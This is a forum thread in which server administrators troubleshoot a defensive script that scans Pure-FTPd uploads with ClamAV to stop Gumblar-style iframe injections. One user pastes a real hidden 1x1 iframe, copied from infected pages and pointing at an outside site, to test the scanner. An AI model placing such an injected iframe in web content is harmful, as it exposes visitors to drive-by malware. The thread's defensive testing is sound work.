SOLUTION for Gumblar/IFRAME/JS hacks with stolen FTP Passwords...

[webicom]

Hello,

I have also installed your script step by step from your site but it is not working. I have restart pure ftp and clam and still not working. The only thing I do not quite get and mybe here is the mistake so script dont work is this part at step 2 "Patch /etc/init.d/pure-ftpd" should I do something coze in step 2 I have only Edit /etc/init.d/pure-ftpd as you instruct but do not know what (if anything) should I do here "Edit /etc/init.d/pure-ftpd ".

I would really appreciate your help since your script by description looks fantastic and would be really god defense agains iframe and some other hacks too.

Best regards, Erik

[hidonet]

Hello,

I have also installed your script step by step from your site but it is not working. I have restart pure ftp and clam and still not working. The only thing I do not quite get and mybe here is the mistake so script dont work is this part at step 2 "Patch /etc/init.d/pure-ftpd" should I do something coze in step 2 I have only Edit /etc/init.d/pure-ftpd as you instruct but do not know what (if anything) should I do here "Edit /etc/init.d/pure-ftpd ".

I would really appreciate your help since your script by description looks fantastic and would be really god defense agains iframe and some other hacks too.

Best regards, Erik

Possible problems,

1 ) restart pure ftp with /etc/init.d/pure-ftpd restart, script not working with WHM restart

2 ) you can use nano or vi for editing files. e.g. : nano /etc/init.d/pure-ftpd

a new update will coming soon...

[webicom]

Thanx but I did all that and it is not working. If I use command pa aux | grep clam I do see that /usr/sbin/pure-uploadscript -B -r /root/ftp_clamscan.sh is runing but it does not scan uploaded files. If I kill that proccess and restart pure-ftp proccess starts again but just wunt to scan files.

[ThE EnD]

hello ,
first let me thank u soo much for that great work
and hard one

but iam sorry telling u i can't make it work on my server

i follow all the steps
Anti-Gumblar Protection Documentation
all of it

but what i do after that
should i make any thing
open and files or any thing to make the script start

or what

and another thing
when i type

/etc/init.d/pure-ftpd restart


i get that result

root@host [~]# /etc/init.d/pure-ftpd restart
Stopping pure-config.pl: cat: /var/run/pure-ftpd/pure-uploadscript.pid: No such file or directory
kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]

Stopping pure-authd:
Starting pure-config.pl: Running: /usr/sbin/pure-ftpd -O clf:/var/log/xferlog --daemonize -A -c50 -B -C8 -D -fftp -H -I15 -lextauth:/var/run/ftpd.sock -L2000:8 -m4 -s -U133:022 -u100 -Oxferlog:/usr/local/apache/domlogs/ftpxferlog -k99 -Z -Y1 -JHIGH:MEDIUM:+TLSv1:!SSLv2:+SSLv3
[ OK ]
Starting pure-authd:

can u solve that please and thank you

and should i replace that
GLOBALS["whmhash"] ="511e....2c"; // whm remote access key for root user

with the correct key i get from whm

in ThE EnD iam sorry for my english
waiting ur answer

[Vinayak]

@ ThE EnD
@ webicom

Have you guys made the script executable, check file permissions.

Also note that there are two files one ftp_clamscan.sh that passes variables to ftp_clamscan.php, so both should have correct permissions.

@ webicom
Yes you should

GLOBALS["whmhash"] ="511e....2c"; // whm remote access key for root user

with the correct key i get from whm

[ThE EnD]

@ ThE EnD
@ webicom

Have you guys made the script executable, check file permissions.

Also note that there are two files one ftp_clamscan.sh that passes variables to ftp_clamscan.php, so both should have correct permissions.

@ webicom
Yes you should

i have gave the two files the chmod 755 , is that ok
and then replace the access key with the right now from the whm for the root

and thin try to make

root@host [~]# /etc/init.d/pure-ftpd restart
Stopping pure-config.pl: cat: /var/run/pure-ftpd/pure-uploadscript.pid: No such file or directory
kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]

Stopping pure-authd:
Starting pure-config.pl: Running: /usr/sbin/pure-ftpd -O clf:/var/log/xferlog --daemonize -A -c50 -B -C8 -D -fftp -H -I15 -lextauth:/var/run/ftpd.sock -L2000:8 -m4 -s -U133:022 -u100 -Oxferlog:/usr/local/apache/domlogs/ftpxferlog -k99 -Z -Y1 -JHIGH:MEDIUM:+TLSv1:!SSLv2:+SSLv3
[ OK ]
Starting pure-authd:

so what's the error here ?and how to solve that problem

and how to start the script working

please explain

[Vinayak]

Use

chmod +x ftp_clamscan.sh
chmod +x ftp_clamscan.php

At command line, also see if an error_log file is generated in the same folder. If error_log is there check it out, see what message is in there.

[webicom]

Thank you vinsar, I forgot to chmod php file and now that I did it is working. But still have strange problem on one server scripts allways find iframe script and block the attacker but does not change password for infected user. On the other server script does not allways find iframe script but do block IP and change pasword. The first server is cetnOS 4.7 other one is 5.2 both are same WHM/Cpanel version. Usualy on server where script does not always find iframe script after it finds infected file I have to kill pid of the ftp_clamscan.sh script and restart pure-ftpd and then it finds script again but after firs find it does not find anymore. Any idea why is that?

[ThE EnD]

i have make the changes as u reques for the two files

and these files in the root directory

or when should i replace it
and also

iam still finiding the same error when restating ftp

/etc/init.d/pure-ftpd restart
Stopping pure-config.pl: cat: /var/run/pure-ftpd/pure-uploadscript.pid: No such file or directory
kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]

Stopping pure-authd:
Starting pure-config.pl: Running: /usr/sbin/pure-ftpd -O clf:/var/log/xferlog -- daemonize -A -c50 -B -C8 -D -fftp -H -I15 -lextauth:/var/run/ftpd.sock -L2000:8 -m4 -s -U133:022 -u100 -Oxferlog:/usr/local/apache/domlogs/ftpxferlog -k99 -Z -Y 1 -JHIGH:MEDIUM:+TLSv1:!SSLv2:+SSLv3
[ OK ]
Starting pure-authd:


please tell me what 's that
as it's from the two line u ask to add in the ftp conf. files
in ur explain

and u do not answer me

after all that how to know if the script is running or not

and thanks

[webicom]

i have make the changes as u reques for the two files

and these files in the root directory

or when should i replace it
and also

iam still finiding the same error when restating ftp

/etc/init.d/pure-ftpd restart
Stopping pure-config.pl: cat: /var/run/pure-ftpd/pure-uploadscript.pid: No such file or directory
kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]

Stopping pure-authd:
Starting pure-config.pl: Running: /usr/sbin/pure-ftpd -O clf:/var/log/xferlog -- daemonize -A -c50 -B -C8 -D -fftp -H -I15 -lextauth:/var/run/ftpd.sock -L2000:8 -m4 -s -U133:022 -u100 -Oxferlog:/usr/local/apache/domlogs/ftpxferlog -k99 -Z -Y 1 -JHIGH:MEDIUM:+TLSv1:!SSLv2:+SSLv3
[ OK ]
Starting pure-authd:


please tell me what 's that
as it's from the two line u ask to add in the ftp conf. files
in ur explain

and u do not answer me

after all that how to know if the script is running or not

and thanks

run command through ssh ps aux | grep clam and reply here what you get. The best way to test if script is working is that you upload index.html or whatever file with iframe in it and if you have set everything right you should be disconected from server and get email. If you are gona test this way make shore you stil have another locatin with diferent IP from where you can connect again.

[hidonet]

Thank you vinsar, I forgot to chmod php file and now that I did it is working. But still have strange problem on one server scripts allways find iframe script and block the attacker but does not change password for infected user. On the other server script does not allways find iframe script but do block IP and change pasword. The first server is cetnOS 4.7 other one is 5.2 both are same WHM/Cpanel version. Usualy on server where script does not always find iframe script after it finds infected file I have to kill pid of the ftp_clamscan.sh script and restart pure-ftpd and then it finds script again but after firs find it does not find anymore. Any idea why is that?

There is a problem on some servers. Pure FTP not returning username and blocking routine is not running because of that..

I tested this problem on vinsar's server and his server not returning username argument.

I'm updating the script... Coming very soon...

[ThE EnD]

thanks for ur reply the

result of the command was
:

root@host [~]# ps aux | grep clam
root 3222 0.0 0.9 103128 74740 ? Ssl Aug15 1:41 /usr/sbin/clamd
root 20499 0.0 0.0 3916 676 pts/0 R+ 04:28 0:00 grep clam

and iam going to test uploading the page now

[ThE EnD]

i have modified a html file and add the code in it

<iframe src="http://neglite.com/?click=ADB9A" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

and upload it to one of my server sites

but no action
no email
not disconnected or bloked
not thing happen

[mtindor]

i have modified a html file and add the code in it


and upload it to one of my server sites

but no action
no email
not disconnected or bloked
not thing happen

Are you sure that URL in that iframe is a known malicious URL that might somehow be in the database for ClamAV? Simply adding any old Iframe isn't going to do anything. It's not supposed to catch _all_ Iframes.

mike

[ThE EnD]

iam sure as i have get that codes from already infected pages